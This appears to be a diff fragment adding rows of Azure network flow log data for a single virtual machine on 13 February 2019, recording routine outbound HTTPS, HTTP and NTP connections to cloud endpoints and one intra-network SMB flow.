+830,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 01:23:47.634,2019-02-13 00:55:10.000,2019-02-13 00:57:33.000,2019-02-13 01:00:00.000,IntraVNet,,,,,10.0.3.4,10.0.3.5,T,microsoft-ds,445.0,I,0.0,3.0,0.0,0.0,,eastus,10.0.3.4,3.0
+829,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 01:23:47.634,2019-02-13 00:55:10.000,2019-02-13 00:57:33.000,2019-02-13 01:00:00.000,IntraVNet,,,,,10.0.3.4,10.0.3.5,T,microsoft-ds,445.0,O,3.0,0.0,0.0,0.0,,eastus,10.0.3.5,3.0
+810,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 02:23:01.728,2019-02-13 00:59:51.000,2019-02-13 01:56:01.000,2019-02-13 02:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['13.71.172.130'],,,T,https,443.0,O,13.0,0.0,0.0,0.0,canadacentral,eastus,13.71.172.130,13.0
+811,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 02:23:01.728,2019-02-13 01:08:43.000,2019-02-13 01:08:43.000,2019-02-13 02:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['40.124.45.19'],,,T,https,443.0,O,1.0,0.0,0.0,0.0,southcentralus,eastus,40.124.45.19,1.0
+812,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 02:23:01.728,2019-02-13 01:11:39.000,2019-02-13 01:45:47.000,2019-02-13 02:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['52.168.138.145'],,,U,ntp,123.0,O,3.0,0.0,0.0,0.0,eastus,eastus,52.168.138.145,3.0
+814,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 02:23:01.728,2019-02-13 01:11:50.000,2019-02-13 01:58:37.000,2019-02-13 02:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.44.109', '40.77.228.69']",,,T,https,443.0,O,5.0,0.0,0.0,0.0,eastus2,eastus,65.55.44.109,5.0
+815,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 02:23:01.728,2019-02-13 01:11:50.000,2019-02-13 01:58:37.000,2019-02-13 02:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.44.109', '40.77.228.69']",,,T,https,443.0,O,5.0,0.0,0.0,0.0,eastus2,eastus,40.77.228.69,5.0
+813,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 02:23:01.728,2019-02-13 01:29:01.000,2019-02-13 01:29:01.000,2019-02-13 02:00:00.000,ExternalPublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['172.217.8.3'],,,T,https,443.0,O,1.0,0.0,0.0,0.0,,eastus,172.217.8.3,1.0
+804,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 03:24:08.123,2019-02-13 02:01:36.000,2019-02-13 02:54:30.000,2019-02-13 03:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['13.71.172.130'],,,T,https,443.0,O,12.0,0.0,0.0,0.0,canadacentral,eastus,13.71.172.130,12.0
+806,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 03:24:08.123,2019-02-13 02:02:51.000,2019-02-13 02:54:03.000,2019-02-13 03:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['52.168.138.145'],,,U,ntp,123.0,O,4.0,0.0,0.0,0.0,eastus,eastus,52.168.138.145,4.0
+807,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 03:24:08.123,2019-02-13 02:08:43.000,2019-02-13 02:58:38.000,2019-02-13 03:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.44.109', '65.55.44.108', '40.77.228.69']",,,T,https,443.0,O,6.0,0.0,0.0,0.0,eastus2,eastus,65.55.44.109,6.0
+808,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 03:24:08.123,2019-02-13 02:08:43.000,2019-02-13 02:58:38.000,2019-02-13 03:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.44.109', '65.55.44.108', '40.77.228.69']",,,T,https,443.0,O,6.0,0.0,0.0,0.0,eastus2,eastus,65.55.44.108,6.0
+809,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 03:24:08.123,2019-02-13 02:08:43.000,2019-02-13 02:58:38.000,2019-02-13 03:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.44.109', '65.55.44.108', '40.77.228.69']",,,T,https,443.0,O,6.0,0.0,0.0,0.0,eastus2,eastus,40.77.228.69,6.0
+805,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 03:24:08.123,2019-02-13 02:23:43.000,2019-02-13 02:38:43.000,2019-02-13 03:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['40.124.45.19'],,,T,https,443.0,O,2.0,0.0,0.0,0.0,southcentralus,eastus,40.124.45.19,2.0
+788,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 04:22:44.061,2019-02-13 03:00:01.000,2019-02-13 03:55:33.000,2019-02-13 04:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['13.71.172.130'],,,T,https,443.0,O,13.0,0.0,0.0,0.0,canadacentral,eastus,13.71.172.130,13.0
+791,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 04:22:44.061,2019-02-13 03:11:07.000,2019-02-13 03:45:15.000,2019-02-13 04:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['52.168.138.145'],,,U,ntp,123.0,O,3.0,0.0,0.0,0.0,eastus,eastus,52.168.138.145,3.0
+794,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 04:22:44.061,2019-02-13 03:13:38.000,2019-02-13 03:58:39.000,2019-02-13 04:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.44.109', '65.55.44.108']",,,T,https,443.0,O,8.0,0.0,0.0,0.0,eastus2,eastus,65.55.44.108,8.0
+793,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 04:22:44.061,2019-02-13 03:13:38.000,2019-02-13 03:58:39.000,2019-02-13 04:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.44.109', '65.55.44.108']",,,T,https,443.0,O,8.0,0.0,0.0,0.0,eastus2,eastus,65.55.44.109,8.0
+790,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 04:22:44.061,2019-02-13 03:22:50.000,2019-02-13 03:22:50.000,2019-02-13 04:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['40.77.232.95'],,,T,https,443.0,O,1.0,0.0,0.0,0.0,westcentralus,eastus,40.77.232.95,1.0
+792,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 04:22:44.061,2019-02-13 03:53:10.000,2019-02-13 03:53:11.000,2019-02-13 04:00:00.000,ExternalPublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['72.21.81.200'],,,T,https,443.0,O,2.0,0.0,0.0,0.0,,eastus,72.21.81.200,2.0
+789,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 04:22:44.061,2019-02-13 03:54:11.000,2019-02-13 03:54:11.000,2019-02-13 04:00:00.000,ExternalPublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['72.21.91.29'],,,T,http,80.0,O,1.0,0.0,0.0,0.0,,eastus,72.21.91.29,1.0
+795,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 05:22:27.769,2019-02-13 04:01:01.000,2019-02-13 04:55:12.000,2019-02-13 05:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['13.71.172.130'],,,T,https,443.0,O,12.0,0.0,0.0,0.0,canadacentral,eastus,13.71.172.130,12.0
+798,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 05:22:27.769,2019-02-13 04:02:19.000,2019-02-13 04:53:31.000,2019-02-13 05:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['52.168.138.145'],,,U,ntp,123.0,O,4.0,0.0,0.0,0.0,eastus,eastus,52.168.138.145,4.0
+799,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 05:22:27.769,2019-02-13 04:02:42.000,2019-02-13 04:22:43.000,2019-02-13 05:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['20.38.98.100'],,,T,https,443.0,O,2.0,0.0,0.0,0.0,eastus,eastus,20.38.98.100,2.0
+797,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 05:22:27.769,2019-02-13 04:08:43.000,2019-02-13 04:08:43.000,2019-02-13 05:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['40.124.45.19'],,,T,https,443.0,O,1.0,0.0,0.0,0.0,southcentralus,eastus,40.124.45.19,1.0
+802,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 05:22:27.769,2019-02-13 04:12:49.000,2019-02-13 04:58:39.000,2019-02-13 05:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.44.109', '65.55.44.108', '13.68.93.109', '40.77.228.69']",,,T,https,443.0,O,9.0,0.0,0.0,0.0,eastus2,eastus,13.68.93.109,9.0
+801,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 05:22:27.769,2019-02-13 04:12:49.000,2019-02-13 04:58:39.000,2019-02-13 05:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.44.109', '65.55.44.108', '13.68.93.109', '40.77.228.69']",,,T,https,443.0,O,9.0,0.0,0.0,0.0,eastus2,eastus,65.55.44.108,9.0
+803,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 05:22:27.769,2019-02-13 04:12:49.000,2019-02-13 04:58:39.000,2019-02-13 05:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.44.109', '65.55.44.108', '13.68.93.109', '40.77.228.69']",,,T,https,443.0,O,9.0,0.0,0.0,0.0,eastus2,eastus,40.77.228.69,9.0
+800,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 05:22:27.769,2019-02-13 04:12:49.000,2019-02-13 04:58:39.000,2019-02-13 05:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.44.109', '65.55.44.108', '13.68.93.109', '40.77.228.69']",,,T,https,443.0,O,9.0,0.0,0.0,0.0,eastus2,eastus,65.55.44.109,9.0
+796,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 05:22:27.769,2019-02-13 04:56:12.000,2019-02-13 04:56:12.000,2019-02-13 05:00:00.000,ExternalPublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['13.107.4.50'],,,T,http,80.0,O,1.0,0.0,0.0,0.0,,eastus,13.107.4.50,1.0
+772,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 06:23:20.239,2019-02-13 04:59:37.000,2019-02-13 05:59:10.000,2019-02-13 06:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['13.71.172.130'],,,T,https,443.0,O,13.0,0.0,0.0,0.0,canadacentral,eastus,13.71.172.130,13.0
+780,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 06:23:20.255,2019-02-13 05:08:43.000,2019-02-13 05:58:40.000,2019-02-13 06:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.44.109', '65.55.44.108']",,,T,https,443.0,O,3.0,0.0,0.0,0.0,eastus2,eastus,65.55.44.108,3.0
+779,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 06:23:20.255,2019-02-13 05:08:43.000,2019-02-13 05:58:40.000,2019-02-13 06:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.44.109', '65.55.44.108']",,,T,https,443.0,O,3.0,0.0,0.0,0.0,eastus2,eastus,65.55.44.109,3.0
+775,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 06:23:20.255,2019-02-13 05:10:35.000,2019-02-13 05:44:43.000,2019-02-13 06:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['52.168.138.145'],,,U,ntp,123.0,O,3.0,0.0,0.0,0.0,eastus,eastus,52.168.138.145,3.0
+776,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 06:23:20.255,2019-02-13 05:28:39.000,2019-02-13 05:43:40.000,2019-02-13 06:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['40.77.226.250'],,,T,https,443.0,O,2.0,0.0,0.0,0.0,northeurope,eastus,40.77.226.250,2.0
+773,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 06:23:20.255,2019-02-13 05:38:44.000,2019-02-13 05:38:44.000,2019-02-13 06:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['40.124.45.19'],,,T,https,443.0,O,1.0,0.0,0.0,0.0,southcentralus,eastus,40.124.45.19,1.0
+774,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 06:23:20.255,2019-02-13 05:46:50.000,2019-02-13 05:46:50.000,2019-02-13 06:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['40.77.232.95'],,,T,https,443.0,O,1.0,0.0,0.0,0.0,westcentralus,eastus,40.77.232.95,1.0
+764,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 07:22:35.252,2019-02-13 06:01:47.000,2019-02-13 06:52:59.000,2019-02-13 07:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['52.168.138.145'],,,U,ntp,123.0,O,4.0,0.0,0.0,0.0,eastus,eastus,52.168.138.145,4.0
+761,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 07:22:35.252,2019-02-13 06:04:34.000,2019-02-13 06:55:37.000,2019-02-13 07:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['13.71.172.130'],,,T,https,443.0,O,12.0,0.0,0.0,0.0,canadacentral,eastus,13.71.172.130,12.0
+762,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 07:22:35.252,2019-02-13 06:10:31.000,2019-02-13 06:10:31.000,2019-02-13 07:00:00.000,ExternalPublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['72.21.91.29'],,,T,http,80.0,O,1.0,0.0,0.0,0.0,,eastus,72.21.91.29,1.0
+768,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 07:22:35.267,2019-02-13 06:13:40.000,2019-02-13 06:58:41.000,2019-02-13 07:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.44.109', '65.55.44.108']",,,T,https,443.0,O,5.0,0.0,0.0,0.0,eastus2,eastus,65.55.44.108,5.0
+767,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 07:22:35.267,2019-02-13 06:13:40.000,2019-02-13 06:58:41.000,2019-02-13 07:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.44.109', '65.55.44.108']",,,T,https,443.0,O,5.0,0.0,0.0,0.0,eastus2,eastus,65.55.44.109,5.0
+765,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 07:22:35.267,2019-02-13 06:28:14.000,2019-02-13 06:28:14.000,2019-02-13 07:00:00.000,ExternalPublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['172.217.15.99'],,,T,https,443.0,O,1.0,0.0,0.0,0.0,,eastus,172.217.15.99,1.0
+763,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 07:22:35.252,2019-02-13 06:38:44.000,2019-02-13 06:53:44.000,2019-02-13 07:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['40.124.45.19'],,,T,https,443.0,O,2.0,0.0,0.0,0.0,southcentralus,eastus,40.124.45.19,2.0
+766,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 07:22:35.267,2019-02-13 06:43:34.000,2019-02-13 06:43:34.000,2019-02-13 07:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['20.38.98.100'],,,T,https,443.0,O,1.0,0.0,0.0,0.0,eastus,eastus,20.38.98.100,1.0
+769,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 08:23:31.719,2019-02-13 06:59:50.000,2019-02-13 07:56:33.000,2019-02-13 08:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['13.71.172.130'],,,T,https,443.0,O,13.0,0.0,0.0,0.0,canadacentral,eastus,13.71.172.130,13.0
+777,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 08:23:31.781,2019-02-13 07:08:51.000,2019-02-13 07:58:42.000,2019-02-13 08:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.44.109', '40.77.228.69']",,,T,https,443.0,O,5.0,0.0,0.0,0.0,eastus2,eastus,65.55.44.109,5.0
+778,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 08:23:31.781,2019-02-13 07:08:51.000,2019-02-13 07:58:42.000,2019-02-13 08:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.44.109', '40.77.228.69']",,,T,https,443.0,O,5.0,0.0,0.0,0.0,eastus2,eastus,40.77.228.69,5.0
+771,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 08:23:31.766,2019-02-13 07:10:03.000,2019-02-13 07:44:11.000,2019-02-13 08:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['52.168.138.145'],,,U,ntp,123.0,O,3.0,0.0,0.0,0.0,eastus,eastus,52.168.138.145,3.0
+756,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 09:24:44.134,2019-02-13 08:01:15.000,2019-02-13 08:52:27.000,2019-02-13 09:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['52.168.138.145'],,,U,ntp,123.0,O,4.0,0.0,0.0,0.0,eastus,eastus,52.168.138.145,4.0
+754,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 09:24:44.134,2019-02-13 08:02:02.000,2019-02-13 08:57:49.000,2019-02-13 09:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['13.71.172.130'],,,T,https,443.0,O,13.0,0.0,0.0,0.0,canadacentral,eastus,13.71.172.130,13.0
+755,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 09:24:44.134,2019-02-13 08:08:44.000,2019-02-13 08:08:44.000,2019-02-13 09:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['40.124.45.19'],,,T,https,443.0,O,1.0,0.0,0.0,0.0,southcentralus,eastus,40.124.45.19,1.0
+760,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 09:24:44.134,2019-02-13 08:13:42.000,2019-02-13 08:58:42.000,2019-02-13 09:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.44.109', '65.55.44.108', '40.77.228.69']",,,T,https,443.0,O,5.0,0.0,0.0,0.0,eastus2,eastus,40.77.228.69,5.0
+758,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 09:24:44.134,2019-02-13 08:13:42.000,2019-02-13 08:58:42.000,2019-02-13 09:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.44.109', '65.55.44.108', '40.77.228.69']",,,T,https,443.0,O,5.0,0.0,0.0,0.0,eastus2,eastus,65.55.44.109,5.0
+759,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 09:24:44.134,2019-02-13 08:13:42.000,2019-02-13 08:58:42.000,2019-02-13 09:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.44.109', '65.55.44.108', '40.77.228.69']",,,T,https,443.0,O,5.0,0.0,0.0,0.0,eastus2,eastus,65.55.44.108,5.0
+757,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 09:24:44.134,2019-02-13 08:28:42.000,2019-02-13 08:28:42.000,2019-02-13 09:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['40.77.226.250'],,,T,https,443.0,O,1.0,0.0,0.0,0.0,northeurope,eastus,40.77.226.250,1.0
+746,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 10:42:20.946,2019-02-13 09:03:00.000,2019-02-13 09:55:59.000,2019-02-13 10:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['13.71.172.130'],,,T,https,443.0,O,12.0,0.0,0.0,0.0,canadacentral,eastus,13.71.172.130,12.0
+748,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 10:42:20.946,2019-02-13 09:09:31.000,2019-02-13 09:43:39.000,2019-02-13 10:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['52.168.138.145'],,,U,ntp,123.0,O,3.0,0.0,0.0,0.0,eastus,eastus,52.168.138.145,3.0
+751,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 10:42:20.946,2019-02-13 09:09:40.000,2019-02-13 09:09:40.000,2019-02-13 10:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['20.38.98.100'],,,T,https,443.0,O,1.0,0.0,0.0,0.0,eastus,eastus,20.38.98.100,1.0
+753,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 10:42:20.946,2019-02-13 09:13:42.000,2019-02-13 09:58:43.000,2019-02-13 10:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.44.109', '65.55.44.108']",,,T,https,443.0,O,5.0,0.0,0.0,0.0,eastus2,eastus,65.55.44.108,5.0
+752,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 10:42:20.946,2019-02-13 09:13:42.000,2019-02-13 09:58:43.000,2019-02-13 10:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.44.109', '65.55.44.108']",,,T,https,443.0,O,5.0,0.0,0.0,0.0,eastus2,eastus,65.55.44.109,5.0
+749,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 10:42:20.946,2019-02-13 09:28:42.000,2019-02-13 09:28:42.000,2019-02-13 10:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['40.77.226.250'],,,T,https,443.0,O,1.0,0.0,0.0,0.0,northeurope,eastus,40.77.226.250,1.0
+747,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 10:42:20.946,2019-02-13 09:51:51.000,2019-02-13 09:51:51.000,2019-02-13 10:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['40.77.232.95'],,,T,https,443.0,O,1.0,0.0,0.0,0.0,westcentralus,eastus,40.77.232.95,1.0
+750,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 10:42:20.946,2019-02-13 09:53:10.000,2019-02-13 09:53:11.000,2019-02-13 10:00:00.000,ExternalPublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['72.21.81.200'],,,T,https,443.0,O,2.0,0.0,0.0,0.0,,eastus,72.21.81.200,2.0
+743,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 11:18:43.949,2019-02-13 10:00:43.000,2019-02-13 10:51:55.000,2019-02-13 11:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['52.168.138.145'],,,U,ntp,123.0,O,4.0,0.0,0.0,0.0,eastus,eastus,52.168.138.145,4.0
+738,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 11:18:43.949,2019-02-13 10:00:48.000,2019-02-13 10:56:03.000,2019-02-13 11:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['13.71.172.130'],,,T,https,443.0,O,12.0,0.0,0.0,0.0,canadacentral,eastus,13.71.172.130,12.0
+745,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 11:18:43.949,2019-02-13 10:13:43.000,2019-02-13 10:58:43.000,2019-02-13 11:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['65.55.44.109'],,,T,https,443.0,O,4.0,0.0,0.0,0.0,eastus2,eastus,65.55.44.109,4.0
+744,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 11:18:43.949,2019-02-13 10:23:11.000,2019-02-13 10:23:11.000,2019-02-13 11:00:00.000,ExternalPublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['157.55.135.128'],,,T,https,443.0,O,1.0,0.0,0.0,0.0,,eastus,157.55.135.128,1.0
+742,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 11:18:43.949,2019-02-13 10:23:11.000,2019-02-13 10:23:11.000,2019-02-13 11:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['40.124.45.19'],,,T,https,443.0,O,1.0,0.0,0.0,0.0,southcentralus,eastus,40.124.45.19,1.0
+729,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 12:23:41.471,2019-02-13 11:01:07.000,2019-02-13 11:55:54.000,2019-02-13 12:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['13.71.172.130'],,,T,https,443.0,O,13.0,0.0,0.0,0.0,canadacentral,eastus,13.71.172.130,13.0
+731,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 12:23:41.471,2019-02-13 11:08:45.000,2019-02-13 11:08:45.000,2019-02-13 12:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['40.124.45.19'],,,T,https,443.0,O,1.0,0.0,0.0,0.0,southcentralus,eastus,40.124.45.19,1.0
+736,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 12:23:41.471,2019-02-13 11:08:51.000,2019-02-13 11:58:44.000,2019-02-13 12:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.44.109', '40.77.228.69']",,,T,https,443.0,O,5.0,0.0,0.0,0.0,eastus2,eastus,65.55.44.109,5.0
+737,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 12:23:41.471,2019-02-13 11:08:51.000,2019-02-13 11:58:44.000,2019-02-13 12:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.44.109', '40.77.228.69']",,,T,https,443.0,O,5.0,0.0,0.0,0.0,eastus2,eastus,40.77.228.69,5.0
+732,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 12:23:41.471,2019-02-13 11:08:59.000,2019-02-13 11:43:07.000,2019-02-13 12:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['52.168.138.145'],,,U,ntp,123.0,O,3.0,0.0,0.0,0.0,eastus,eastus,52.168.138.145,3.0
+735,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 12:23:41.471,2019-02-13 11:09:45.000,2019-02-13 11:09:45.000,2019-02-13 12:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['20.38.98.100'],,,T,https,443.0,O,1.0,0.0,0.0,0.0,eastus,eastus,20.38.98.100,1.0
+730,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 12:23:41.471,2019-02-13 11:13:39.000,2019-02-13 11:13:39.000,2019-02-13 12:00:00.000,ExternalPublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['72.21.91.29'],,,T,http,80.0,O,1.0,0.0,0.0,0.0,,eastus,72.21.91.29,1.0
+733,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 12:23:41.471,2019-02-13 11:28:52.000,2019-02-13 11:28:52.000,2019-02-13 12:00:00.000,ExternalPublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['172.217.15.99', '172.217.8.14']",,,T,https,443.0,O,2.0,0.0,0.0,0.0,,eastus,172.217.15.99,2.0
+734,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 12:23:41.471,2019-02-13 11:28:52.000,2019-02-13 11:28:52.000,2019-02-13 12:00:00.000,ExternalPublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['172.217.15.99', '172.217.8.14']",,,T,https,443.0,O,2.0,0.0,0.0,0.0,,eastus,172.217.8.14,2.0
+721,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-13 13:24:33.290,2019-02-13 12:00:11.000,2019-02-13 12:51:23.000,2019-02-13 13:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['52.168.138.145'],,,U,ntp,123.0,O,4.0,0.0,0.0,0.0,eastus,eastus,52.168.138.145,4.0
